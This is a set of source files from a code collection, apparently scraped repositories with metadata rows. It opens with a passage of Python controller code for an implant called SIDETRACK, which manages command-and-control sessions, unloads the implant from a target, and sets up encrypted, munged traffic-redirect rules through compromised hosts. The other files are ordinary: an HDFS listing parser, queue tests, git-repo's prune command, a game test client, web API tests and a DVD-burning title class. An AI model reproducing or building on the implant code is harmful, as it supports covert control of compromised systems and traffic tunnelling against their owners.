        self.usage = "ccremove <rule>"
        self.info = "Remove a command and control session (see also: done)"
        self.op = 0x2aL

    def run(self,rule):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        self.data = struct.pack("!L",rule)
        self.Query()
        if self.op == 0x2aL and self.res == 0x1L:
            return (1, "Session removed successfully")
        else:
            return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")

#############################################################################
# UNLOAD class
#       opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "stunload"
        self.usage = "stunload <magic>"
        self.info = "Remove SIDETRACK from the target"
        self.op = 0x30L

    def run(self, magic):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        self.data = struct.pack("!L",magic);
        self.Query()
        if self.op == 0x30L and self.res == 0x1L:
            return (1, "SIDETRACK successfully removed from target")
        else:
            return (0, "Cannot remove SIDETRACK");

base.RegisterImplant('SIDETRACK', SIDETRACK)

class REDIRECT(SIDECMD):
    def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
                 A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
                 A_port, SA_port, T_port, ST_port):
        SIDECMD.__init__(self)
        self.protocol = cmd.protocol
        self.implant = cmd.implant
        self.session = cmd.implant.session
        self.target = cmd.implant.session.target
        self.longevity = longevity
        self.nextRule = next
        self.connection_timeout = connection_timeout
        self.proto = protocol
        self.A_ip = A_ip
        self.T_ip = T_ip
        self.ident = ident
        self.seq = seq
        self.munge = munge
        self.crypto_key = crypto_key
        self.ttl_mod = ttl_mod
        self.flags = flags
        self.A_port = A_port
        self.SA_port = SA_port
        self.T_port = T_port
        self.ST_port = ST_port
        self.added = 0
        self.localRuleNum = None
        self.remoteRuleNum = None
        self.prev = None
        self.next = None
        self.ccPassthru = None

    def remove(self,direction=0):
        if self.added == 0:
            return (0, "Rule does not exist")
        if self.ccPassthru != None:
            cmd = self.ccPassthru.GetCommand('done')
            cmd.run()
        if direction != 1 and self.next != None:
            res = self.next.remove(2)
            if res[0] == 0:
                return (res[0], "Rule could not be removed: " + res[1])
            self.next = None
        if self.remoteRuleNum != None:
            self.op = 0x26L
            self.data = struct.pack("!L",self.remoteRuleNum)
            self.Query()
            if self.op == 0x26L and self.res == 0x1L:
                base.redir.delete(self.localRuleNum)
                self.added = 0
                self.localRuleNum = None
                self.implant.rules.remove(self)
                if direction != 2 and self.prev != None:
                    res = self.prev.remove(1)
                    if res[0] == 0:
                        return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
                return (1, "Rule %d removed"%(self.remoteRuleNum))
            else:
                return (0, "Rule could not be removed")
        else:
            base.redir.delete(self.localRuleNum)
            return (1, "Local rule removed")

    def set(self,value,direction=0):
        if self.added == 0:
            return (0, "Rule does not exist")
        if direction != 1 and self.next != None:
            res = self.next.set(value,2)
            if res[0] == 0:
                return(res[0], "Rule could not be set: " + res[1])
        if self.remoteRuleNum:
            self.op = 0x25L
            self.data = struct.pack("!LH",self.remoteRuleNum, value)
            self.Query()
            if self.op == 0x25L and self.res == 0x1L:
                base.redir.set(self.localRuleNum, value)
                if direction != 2 and self.prev != None:
                    res = self.prev.set(value,1)
                    if res[0] == 0:
                        return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
                return (1, "Rule %d set"%(self.remoteRuleNum))
            else:
                return (0, "Rule could not be set")
        else:
            base.redir.set(self.localRuleNum, value)
            return (1, "Local rule set")

    def add(self, addremote=1):
        if self.added == 1:
            return (0, "Rule already exists", 0)
        AT_ip = 0
        if addremote:
            self.op = 0x23L
            self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
                                    self.connection_timeout)
            self.data = self.data + self.A_ip + self.T_ip
            self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
                        (self.ttl_mod << 8 | self.proto), self.munge,\
                        self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
                        self.crypto_key[3], self.ident, 0, self.A_port, \
                        self.SA_port, self.T_port, self.ST_port, self.seq)
            self.Query()
            if self.op == 0x23L and self.res == 0x01L:
                self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
                AT_ip = struct.unpack("!L", self.data[4:8])[0]
                self.ST_ip = self.data[4:8]
                res = base.redir.redir(self.longevity,self.connection_timeout,\
                                       self.ConvertIP(self.target.ip), \
                                       self.T_ip,\
                                       self.seq, self.munge, self.crypto_key, \
                                       self.flags, self.A_port, self.SA_port,\
                                       self.ident, self.proto)
                if res < 1:
                    self.op = 0x26L
                    self.data = struct.pack("!L",self.remoteRuleNum)
                    self.Query()
                    if self.op == 0x26L and self.res == 0x1L:
                        self.remoteRuleNum = None
                        return (0, "Local rule could not be added", AT_ip)
                    else:
                        return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
                self.localRuleNum = res
                self.added = 1
                self.implant.rules.append(self)
                return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
            else:
                return (0, "Remote rule could not be added", AT_ip)
        else:
            self.remoteRuleNum = None
            res = base.redir.redir(self.longevity,self.connection_timeout,\
                                   self.ConvertIP(self.target.ip), \
                                   self.T_ip,\
                                   self.seq, self.munge, self.crypto_key, \
                                   self.flags, self.A_port, self.SA_port,\
                                   self.ident, self.proto)
            if res < 1:
                return (0, "Local rule could not be added", 0)
            self.added = 1
            self.localRuleNum = res
            return (1, "Local rule added", 0)
unlicense
5,147,977,936,728,221,000
35.501265
289
0.462023
false
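The flags word assembled in SIDECMD_REDIRADD.run above packs each redirect option into one bit. A minimal decoding sketch, not part of the dataset row: the bit names below are informal labels inferred from that code, not identifiers from the original tool.

# Illustrative only: bit layout inferred from the rediradd command above.
REDIR_FLAG_BITS = {
    0: "active", 1: "afix", 2: "tfix", 3: "ttl_reset",
    4: "encrypt", 5: "munge", 6: "all_redirect", 7: "all_proto_AT",
    8: "all_proto_TA", 9: "cc_support", 10: "samesum",
}

def decode_redir_flags(flags):
    """Return the names of the bits set in a redirect rule's flags word."""
    return [name for bit, name in sorted(REDIR_FLAG_BITS.items())
            if flags & (1 << bit)]

# Example: a word with bits 0,1,2,3 and 5 set, as the defaults would produce:
print(decode_redir_flags(0b101111))
# -> ['active', 'afix', 'tfix', 'ttl_reset', 'munge']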
simondolle/hls-autocomplete
hls_autocomplete/parse.py
1
5470
#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import datetime
from time import strptime
import re
import os
import json


class FileStatus(object):
    def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
        self.path = path
        self.rights = rights
        self.nbFiles = nbFiles
        self.owner = owner
        self.group = group
        self.size = size
        self.date = date
        self.relpath = relpath

    def __eq__(self, other):
        return (self.path == other.path and self.rights == other.rights and
                self.nbFiles == other.nbFiles and self.owner == other.owner and
                self.group == other.group and self.size == other.size and
                self.date == other.date)

    def is_dir(self):
        return self.rights.startswith("d")

    def __str__(self):
        return self.to_str(0, 0, 0, 0, 0, 0, 0)

    def to_str(self, rights_width, nbFiles_width, owner_width, group_width,
               size_width, date_width, path_width):
        # is_dir is a method and must be called; the bare attribute is always
        # truthy, which would print "-" for every entry.
        if self.is_dir():
            nb_files = "-"
        else:
            nb_files = str(self.nbFiles)
        # %m is the month; %M would format the minute.
        result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
                                           nb_files.ljust(nbFiles_width),
                                           self.owner.ljust(owner_width),
                                           self.group.ljust(group_width),
                                           str(self.size).ljust(size_width),
                                           self.date.strftime("%Y-%m-%d %H:%M").ljust(date_width),
                                           self.path.ljust(path_width))
        return result.encode("utf-8")


def get_file_statuses_pretty_print(file_statuses):
    rights_width = 0
    nb_files_width = 0
    owner_width = 0
    group_width = 0
    size_width = 0
    date_width = 0
    path_width = 0
    if len(file_statuses) != 0:
        rights_width = max([len(fs.rights) for fs in file_statuses])
        nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
        owner_width = max([len(fs.owner) for fs in file_statuses])
        group_width = max([len(fs.group) for fs in file_statuses])
        size_width = max([len(str(fs.size)) for fs in file_statuses])
        date_width = max([len(fs.date.strftime("%Y-%m-%d %H:%M")) for fs in file_statuses])
        path_width = max([len(fs.path) for fs in file_statuses])

    result = []
    for file_status in file_statuses:
        result.append(file_status.to_str(rights_width, nb_files_width, owner_width,
                                         group_width, size_width, date_width, path_width))
    return "\n".join(result)


class LsParser(object):
    def __init__(self):
        pass

    def parse_line(self, line):
        regex = "^([rwxd@+-]+)\s+(\d+)\s+(\w+)\s+(\w+)\s+(\d+)\s+(\d+)\s+(\w+)\s+([:\d]+)\s+(/.+)$"
        m = re.match(regex, line, re.UNICODE)
        if m is None:
            return None
        rights = m.group(1)
        nbFiles = int(m.group(2))
        owner = m.group(3)
        group = m.group(4)
        size = int(m.group(5))
        day = int(m.group(6))
        month = m.group(7)
        try:
            month = strptime(month, '%b').tm_mon
        except:
            # fall back to French month abbreviations
            month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil",
                     u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
        try:
            year = int(m.group(8))
        except:
            year = datetime.datetime.now().year
        filename = m.group(9)
        date = datetime.date(year, month, day)
        return FileStatus(filename, rights, nbFiles, owner, group, size, date)

    def parse(self, output):
        result = [self.parse_line(line) for line in output.split("\n")]
        return [p for p in result if p is not None]


class WebHdfsParser(object):
    def __init__(self, path):
        self.path = path

    def permissions_to_unix_name(self, is_dir, rights):
        is_dir_prefix = 'd' if is_dir else '-'
        sticky = False
        if len(rights) == 4 and rights[0] == '1':
            sticky = True
            rights = rights[1:]
        dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--',
               '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
        result = is_dir_prefix + ''.join(dic[x] for x in rights)
        if sticky:
            result = result[:-1] + "t"
        return result

    def parse_status(self, status):
        relpath = status["pathSuffix"]
        path = os.path.join(self.path, relpath)
        nbFiles = 0
        size = status["length"]
        owner = status["owner"]
        group = status["group"]
        is_dir = status["type"] == "DIRECTORY"
        right_digits = status["permission"]
        rights = self.permissions_to_unix_name(is_dir, right_digits)
        parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000)
        date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day,
                                 parsed_date.hour, parsed_date.minute)
        return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)

    def parse(self, output):
        try:
            j = json.loads(output)
        except:
            print output
            return []
        if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
            print j
            return []
        statuses = j["FileStatuses"]["FileStatus"]
        result = []
        for status in statuses:
            result.append(self.parse_status(status))
        return result
mit
8,956,800,245,281,798,000
33.821656
134
0.539601
false
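LsParser.parse_line above matches ls-style lines of the form rights, file count, owner, group, size, day, month, year (or time), absolute path. A hedged usage sketch: the import path is inferred from this row's path field, the sample line is invented, and month parsing via strptime('%b') is locale-dependent.

from hls_autocomplete.parse import LsParser

line = "drwxr-xr-x 3 alice hadoop 4096 12 Jan 2016 /data/logs"
status = LsParser().parse_line(line)
print(status.is_dir())   # True  (rights start with 'd')
print(status.path)       # /data/logs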
shendo/taskq
tests/test_queue.py
1
6485
# TaskQ - Priority queue with task categorisation support
# Copyright (C) 2014 Steve Henderson
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals

import time

from taskq import Queue
from taskq import policy


def test_fifo():
    q = Queue()
    q.push('test1')
    q.push('test2')
    assert q.pop() == 'test1'
    assert q.pop() == 'test2'

def test_duplicate():
    q = Queue()
    q.push('test')
    try:
        q.push('test')
        assert False
    except ValueError:
        pass
    q.discard('test')
    q.push('test')
    assert len(q) == 1

def test_operators():
    q = Queue()
    assert not q
    assert not len(q)
    q.push('test1')
    assert q
    assert len(q)
    q.push('test2')
    assert len(q) == 2

def test_priorities():
    q = Queue()
    q.push('test1', 1)
    q.push('test2', 2)
    q.push('test3', 3)
    assert q.pop() == 'test1'
    assert q.pop() == 'test2'
    assert q.pop() == 'test3'

    q.push('test3', 3)
    q.push('test2', 2)
    q.push('test1', 1)
    assert q.pop() == 'test1'
    assert q.pop() == 'test2'
    assert q.pop() == 'test3'

    # insert order maintained at same priority
    q.push('test1', 1)
    q.push('test2', 1)
    q.push('test3', 1)
    assert q.pop() == 'test1'
    assert q.pop() == 'test2'
    assert q.pop() == 'test3'

    # complex types supported
    q.push('test1', (1, time.time()))
    q.push('test2', (1, time.time()))
    q.push('test3', (1, time.time()))
    assert q.pop() == 'test1'
    assert q.pop() == 'test2'
    assert q.pop() == 'test3'

    q.push('test1', (1, time.time()))
    q.push('test3', (2, time.time()))
    q.push('test2', (1, time.time()))
    assert q.pop() == 'test1'
    assert q.pop() == 'test2'
    assert q.pop() == 'test3'

def test_categories():
    q = Queue()
    q.push('test', category='foo')
    assert q.pop() == 'test'

    q.push('test', category='foo')
    assert not q.pop(categories=['bar'])
    assert q.pop(categories=['foo']) == 'test'

    q.push('test', category='foo')
    assert q.pop(categories=['bar', 'foo', 'cat']) == 'test'

def test_multipop():
    q = Queue()
    q.push('test1')
    assert q.pop(1) == ['test1']

    q = Queue()
    q.push('test1')
    q.push('test2')
    assert q.pop(2) == ['test1', 'test2']

    q = Queue()
    q.push('test1')
    assert q.pop(2) == ['test1']

    q = Queue()
    q.push('test3', 3)
    q.push('test1', 1)
    q.push('test2', 1)
    assert q.pop(2) == ['test1', 'test2']

    q = Queue()
    q.push('test1', category='foo')
    q.push('test2', category='bar')
    q.push('test3', category='foo')
    assert q.pop(2, categories=['fish', 'foo']) == ['test1', 'test3']

    q = Queue()
    for x in range(1000):
        q.push(x)
    for i, x in enumerate(q.pop(1000)):
        assert i == x

def test_ratios():
    q = Queue()
    q.push('test1', 1, 'cat')
    q.push('test2', 2, 'cat')
    q.push('test3', 2, 'cat')
    q.push('test4', 3, 'cat')
    assert len(q.pop(2, categories=['cat'], ratios=[0.5])) == 4

    q = Queue()
    q.push('test1', 2, 'foo')
    assert len(q.pop(1, categories=['foo'], ratios=[20000])) == 1

    q = Queue()
    assert q.pop(10, categories=['foo'], ratios=[20000]) == []

    q = Queue()
    q.push('test1', 1, 'foo')
    q.push('test2', 2, 'bar')
    q.push('test3', 2, 'cat')
    q.push('test4', 3, 'cat')
    assert len(q.pop(3, categories=['cat', 'foo', 'bar'], ratios=[0.5, 1, 1])) == 4

def test_discard():
    q = Queue()
    q.push('test1', 1, 'foo')
    q.discard('test1')
    assert not q
    assert not q.pop()

    q = Queue()
    q.push('test1', 1, 'foo')
    q.push('test2', 1, 'bar')
    q.push('test3', 1, 'foo')
    q.discard('test2')
    assert len(q) == 2
    assert q.pop(2) == ['test1', 'test3']

    q = Queue()
    q.push('test1', 1, 'foo')
    q.push('test2', 1, 'bar')
    q.push('test3', 1, 'foo')
    q.discard('test2')
    q.discard('test1')
    q.compact()
    assert len(q) == 1
    assert q.pop() == 'test3'

def test_policies():
    q = Queue(maxsize=1, full_policy=policy.discard)
    q.push('test1')
    q.push('test2')
    assert len(q) == 1
    assert q.pop() == 'test1'

    q = Queue(maxsize=1, full_policy=policy.discard_random)
    q.push('test1')
    q.push('test2')
    assert len(q) == 1
    assert q.pop() == 'test2'

    q = Queue(maxsize=3, full_policy=policy.discard_random)
    q.push('test1', 1, 'foo')
    q.push('test2', 2, 'bar')
    q.push('test3', 1, 'foo')
    q.push('test4', 3, 'bar')
    assert len(q) == 3
    assert 'test4' in [ q.pop() for _ in range(3) ]

    q = Queue(maxsize=1, full_policy=policy.exception)
    q.push('test1')
    try:
        q.push('test2')
        assert False # should have raised
    except policy.QueueFullException:
        pass

def test_full():
    # default no limit
    q = Queue()
    assert not q.full()
    q.push('test1')
    q.push('test2')
    assert not q.full()

    # 0 = no limit
    q = Queue(maxsize=0)
    assert not q.full()
    q.push('test1')
    q.push('test2')
    assert not q.full()

    # -ve = no limit
    q = Queue(maxsize=-1)
    assert not q.full()
    q.push('test1')
    q.push('test2')
    assert not q.full()

    # check with pop
    q = Queue(maxsize=2)
    assert not q.full()
    q.push('test1')
    q.push('test2')
    assert q.full()
    q.pop()
    assert not q.full()
    q.push('test3')
    assert q.full()

    # check with discard
    q = Queue(maxsize=1)
    assert not q.full()
    q.push('test1')
    assert q.full()
    q.discard('test1')
    assert not q.full()
    q.push('test2')
    assert q.full()

    # check when discarded by policy
    q = Queue(maxsize=1, full_policy=policy.discard)
    assert not q.full()
    q.push('test1')
    assert q.full()
    q.push('test2')
    assert q.full()
    q.pop()
    assert not q.full()
gpl-3.0
-1,092,346,553,628,017,700
23.657795
83
0.551735
false
lipro-yocto/git-repo
subcmds/prune.py
1
1907
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from color import Coloring
from command import PagedCommand


class Prune(PagedCommand):
  common = True
  helpSummary = "Prune (delete) already merged topics"
  helpUsage = """
%prog [<project>...]
"""

  def Execute(self, opt, args):
    all_branches = []
    for project in self.GetProjects(args):
      all_branches.extend(project.PruneHeads())

    if not all_branches:
      return

    class Report(Coloring):
      def __init__(self, config):
        Coloring.__init__(self, config, 'status')
        self.project = self.printer('header', attr='bold')

    out = Report(all_branches[0].project.config)
    out.project('Pending Branches')
    out.nl()

    project = None

    for branch in all_branches:
      if project != branch.project:
        project = branch.project
        out.nl()
        out.project('project %s/' % project.relpath)
        out.nl()

      print('%s %-33s ' % (
          branch.name == project.CurrentBranch and '*' or ' ',
          branch.name), end='')

      if not branch.base_exists:
        print('(ignoring: tracking branch is gone: %s)' % (branch.base,))
      else:
        commits = branch.commits
        date = branch.date
        print('(%2d commit%s, %s)' % (
            len(commits),
            len(commits) != 1 and 's' or ' ',
            date))
apache-2.0
-1,370,391,103,459,699,500
28.796875
74
0.633456
false
longde123/MultiversePlatform
server/src/multiverse/simpleclient/testclientgroups/group12.py
1
1820
#
#  The Multiverse Platform is made available under the MIT License.
#
#  Copyright (c) 2012 The Multiverse Foundation
#
#  Permission is hereby granted, free of charge, to any person
#  obtaining a copy of this software and associated documentation
#  files (the "Software"), to deal in the Software without restriction,
#  including without limitation the rights to use, copy, modify,
#  merge, publish, distribute, sublicense, and/or sell copies
#  of the Software, and to permit persons to whom the Software
#  is furnished to do so, subject to the following conditions:
#
#  The above copyright notice and this permission notice shall be
#  included in all copies or substantial portions of the Software.
#
#  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
#  OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
#  NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#  HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
#  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
#  FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
#  OR OTHER DEALINGS IN THE SOFTWARE.
#
#

from multiverse.mars import *
from multiverse.mars.objects import *
from multiverse.mars.util import *
from multiverse.server.math import *
from multiverse.server.events import *
from multiverse.server.objects import *
from multiverse.server.engine import *
from multiverse.server.util import *
from multiverse.msgsys import *
from multiverse.simpleclient import *
from java.lang import *

# PlayerClient instance

Log.debug("playerclient.py starting PlayerThread");

playerClient = PlayerClient("--zero_y --position (1800505,79698,73582) --square_side 100000")

Log.debug("completed playerclient.py")
mit
2,642,791,384,150,277,000
38.565217
93
0.767033
false
escattone/kuma
kuma/api/v1/tests/test_plus.py
1
4264
import json

import pytest

from kuma.core.urlresolvers import reverse
from kuma.plus.models import LandingPageSurvey


@pytest.mark.django_db
def test_ping_landing_page_survey_happy_path(client, settings):
    # This sets the needed session cookie
    variant_url = reverse("api.v1.plus.landing_page_variant")
    response = client.get(variant_url)
    assert response.status_code == 200
    variant = response.json()["variant"]

    url = reverse("api.v1.plus.landing_page_survey")
    response = client.get(url, HTTP_CLOUDFRONT_VIEWER_COUNTRY_NAME="Antartica")
    assert response.status_code == 200
    (result,) = LandingPageSurvey.objects.all()
    assert result.variant == variant
    assert not result.email
    assert not result.response
    assert result.geo_information == "Antartica"

    # Now fill it with an email
    response = client.post(
        url,
        {"uuid": str(result.uuid), "email": " [email protected] "},
    )
    assert response.status_code == 200
    (result,) = LandingPageSurvey.objects.all()
    assert result.variant == variant
    assert result.email == "[email protected]"
    assert not result.response

    # Now fill it with a response
    response = client.post(
        url,
        {
            "uuid": str(result.uuid),
            "response": json.dumps({"price": "perfect"}),
        },
    )
    assert response.status_code == 200
    (result,) = LandingPageSurvey.objects.all()
    assert result.variant == variant
    assert result.email == "[email protected]"
    assert result.response == json.dumps({"price": "perfect"})


@pytest.mark.django_db
def test_ping_landing_page_survey_bad_request(client):
    url = reverse("api.v1.plus.landing_page_survey")

    # No ?variant=...
    response = client.get(url)
    assert response.status_code == 400

    # This sets the needed session cookie
    variant_url = reverse("api.v1.plus.landing_page_variant")
    response = client.get(variant_url)
    assert response.status_code == 200

    # Not a valid UUID
    response = client.get(url, {"uuid": "xxx"})
    assert response.status_code == 400

    # Not a recognized UUID
    response = client.get(url, {"uuid": "88f7a689-454a-4647-99bf-d62fa66da24a"})
    assert response.status_code == 404


@pytest.mark.django_db
def test_ping_landing_page_survey_reuse_uuid(client):
    # This sets the needed session cookie
    variant_url = reverse("api.v1.plus.landing_page_variant")
    response = client.get(variant_url)
    assert response.status_code == 200

    url = reverse("api.v1.plus.landing_page_survey")
    response1 = client.get(url, HTTP_CLOUDFRONT_VIEWER_COUNTRY_NAME="Sweden")
    assert response1.status_code == 200
    assert LandingPageSurvey.objects.all().count() == 1
    response2 = client.get(
        url,
        {"uuid": response1.json()["uuid"]},
        HTTP_CLOUDFRONT_VIEWER_COUNTRY_NAME="USA",
    )
    assert response2.json()["uuid"] == response1.json()["uuid"]
    assert LandingPageSurvey.objects.all().count() == 1


@pytest.mark.django_db
def test_ping_landing_page_survey_authenticated(user_client, wiki_user):
    # This sets the needed session cookie
    variant_url = reverse("api.v1.plus.landing_page_variant")
    response = user_client.get(variant_url)
    assert response.status_code == 200

    url = reverse("api.v1.plus.landing_page_survey")
    response = user_client.get(url)
    assert response.status_code == 200
    (result,) = LandingPageSurvey.objects.all()
    assert result.user == wiki_user


@pytest.mark.django_db
def test_landing_page_variant_happy_path(client, settings):
    # Note `settings.PLUS_VARIANTS` is set in `kuma.settings.pytest`
    url = reverse("api.v1.plus.landing_page_variant")
    response = client.get(url)
    assert response.status_code == 200
    first_time = response.json()
    assert first_time["variant"] > 0
    assert first_time["variant"] <= len(settings.PLUS_VARIANTS)
    assert first_time["price"] in settings.PLUS_VARIANTS

    # It should stick no matter how many times you run it
    for _ in range(10):
        response = client.get(url)
        assert response.status_code == 200
        assert response.json()["variant"] == first_time["variant"]
        assert response.json()["price"] == first_time["price"]
mpl-2.0
8,353,484,530,019,229,000
33.387097
80
0.673546
false
atvcaptain/enigma2
lib/python/Plugins/Extensions/DVDBurn/Title.py
1
6455
from __future__ import absolute_import
from Components.config import ConfigSubsection, ConfigSubList, ConfigInteger, ConfigText, ConfigSelection
from . import TitleCutter

class ConfigFixedText(ConfigText):
    def __init__(self, text, visible_width=60):
        ConfigText.__init__(self, default = text, fixed_size = True, visible_width = visible_width)

    def handleKey(self, key):
        pass

class Title:
    def __init__(self, project):
        self.properties = ConfigSubsection()
        self.properties.menutitle = ConfigText(fixed_size = False, visible_width = 80)
        self.properties.menusubtitle = ConfigText(fixed_size = False, visible_width = 80)
        self.properties.aspect = ConfigSelection(choices = [("4:3", _("4:3")), ("16:9", _("16:9"))])
        self.properties.widescreen = ConfigSelection(choices = [("nopanscan", "nopanscan"), ("noletterbox", "noletterbox")])
        self.properties.autochapter = ConfigInteger(default = 0, limits = (0, 60))
        self.properties.audiotracks = ConfigSubList()
        self.DVBname = _("Title")
        self.DVBdescr = _("Description")
        self.DVBchannel = _("Channel")
        self.cuesheet = [ ]
        self.source = None
        self.filesize = 0
        self.estimatedDiskspace = 0
        self.inputfile = ""
        self.cutlist = [ ]
        self.chaptermarks = [ ]
        self.timeCreate = None
        self.project = project
        self.length = 0
        self.VideoType = -1
        self.VideoPID = -1
        self.framerate = 0
        self.progressive = -1
        self.resolution = (-1, -1)

    def addService(self, service):
        from os import path
        from enigma import eServiceCenter, iServiceInformation
        from ServiceReference import ServiceReference
        from time import localtime, time
        self.source = service
        serviceHandler = eServiceCenter.getInstance()
        info = serviceHandler.info(service)
        sDescr = info and info.getInfoString(service, iServiceInformation.sDescription) or ""
        self.DVBdescr = sDescr
        sTimeCreate = info.getInfo(service, iServiceInformation.sTimeCreate)
        if sTimeCreate > 1:
            self.timeCreate = localtime(sTimeCreate)
        serviceref = ServiceReference(info.getInfoString(service, iServiceInformation.sServiceref))
        name = info and info.getName(service) or "Title" + sDescr
        self.DVBname = name
        self.DVBchannel = serviceref.getServiceName()
        self.inputfile = service.getPath()
        self.filesize = path.getsize(self.inputfile)
        self.estimatedDiskspace = self.filesize
        self.length = info.getLength(service)

    def addFile(self, filename):
        from enigma import eServiceReference
        ref = eServiceReference(1, 0, filename)
        self.addService(ref)
        self.project.session.openWithCallback(self.titleEditDone, TitleCutter.CutlistReader, self)

    def titleEditDone(self, cutlist):
        self.initDVDmenuText(len(self.project.titles))
        self.cuesheet = cutlist
        self.produceFinalCuesheet()

    def initDVDmenuText(self, track):
        s = self.project.menutemplate.settings
        self.properties.menutitle.setValue(self.formatDVDmenuText(s.titleformat.getValue(), track))
        self.properties.menusubtitle.setValue(self.formatDVDmenuText(s.subtitleformat.getValue(), track))

    def formatDVDmenuText(self, template, track):
        template = template.replace("$i", str(track))
        template = template.replace("$t", self.DVBname)
        template = template.replace("$d", self.DVBdescr)
        template = template.replace("$c", str(len(self.chaptermarks)+1))
        template = template.replace("$f", self.inputfile)
        template = template.replace("$C", self.DVBchannel)

        #if template.find("$A") >= 0:
        audiolist = [ ]
        for audiotrack in self.properties.audiotracks:
            active = audiotrack.active.getValue()
            if active:
                trackstring = audiotrack.format.getValue()
                trackstring += ' (' + audiotrack.language.getValue() + ')'
                audiolist.append(trackstring)
        audiostring = ', '.join(audiolist)
        template = template.replace("$A", audiostring)

        if template.find("$l") >= 0:
            l = self.length
            lengthstring = "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
            template = template.replace("$l", lengthstring)
        if self.timeCreate:
            template = template.replace("$Y", str(self.timeCreate[0]))
            template = template.replace("$M", str(self.timeCreate[1]))
            template = template.replace("$D", str(self.timeCreate[2]))
            timestring = "%d:%02d" % (self.timeCreate[3], self.timeCreate[4])
            template = template.replace("$T", timestring)
        else:
            template = template.replace("$Y", "").replace("$M", "").replace("$D", "").replace("$T", "")
        return template

    def produceFinalCuesheet(self):
        CUT_TYPE_IN = 0
        CUT_TYPE_OUT = 1
        CUT_TYPE_MARK = 2
        CUT_TYPE_LAST = 3

        accumulated_in = 0
        accumulated_at = 0
        last_in = 0

        self.cutlist = [ ]
        self.chaptermarks = [ ]

        # our demuxer expects *strictly* IN,OUT lists.
        currently_in = not any(type == CUT_TYPE_IN for pts, type in self.cuesheet)
        if currently_in:
            self.cutlist.append(0) # emulate "in" at first

        for (pts, type) in self.cuesheet:
            #print "pts=", pts, "type=", type, "accumulated_in=", accumulated_in, "accumulated_at=", accumulated_at, "last_in=", last_in
            if type == CUT_TYPE_IN and not currently_in:
                self.cutlist.append(pts)
                last_in = pts
                currently_in = True

            if type == CUT_TYPE_OUT and currently_in:
                self.cutlist.append(pts)

                # accumulate the segment
                accumulated_in += pts - last_in
                accumulated_at = pts
                currently_in = False

            if type == CUT_TYPE_MARK and currently_in:
                # relocate chaptermark against "in" time. This is not 100% accurate,
                # as the in/out points are not.
                reloc_pts = pts - last_in + accumulated_in
                self.chaptermarks.append(reloc_pts)

        if len(self.cutlist) > 1:
            part = accumulated_in / (self.length*90000.0)
            usedsize = int ( part * self.filesize )
            self.estimatedDiskspace = usedsize
            self.length = accumulated_in / 90000

    def getChapterMarks(self, template="$h:$m:$s.$t"):
        timestamps = [ ]
        chapters = [ ]
        minutes = self.properties.autochapter.getValue()
        if len(self.chaptermarks) < 1 and minutes > 0:
            chapterpts = 0
            while chapterpts < (self.length-60*minutes)*90000:
                chapterpts += 90000 * 60 * minutes
                chapters.append(chapterpts)
        else:
            chapters = self.chaptermarks
        for p in chapters:
            timestring = template.replace("$h", str(p / (90000 * 3600)))
            timestring = timestring.replace("$m", ("%02d" % (p % (90000 * 3600) / (90000 * 60))))
            timestring = timestring.replace("$s", ("%02d" % (p % (90000 * 60) / 90000)))
            timestring = timestring.replace("$t", ("%03d" % ((p % 90000) / 90)))
            timestamps.append(timestring)
        return timestamps
gpl-2.0
1,176,808,851,013,645,800
36.52907
127
0.696514
false
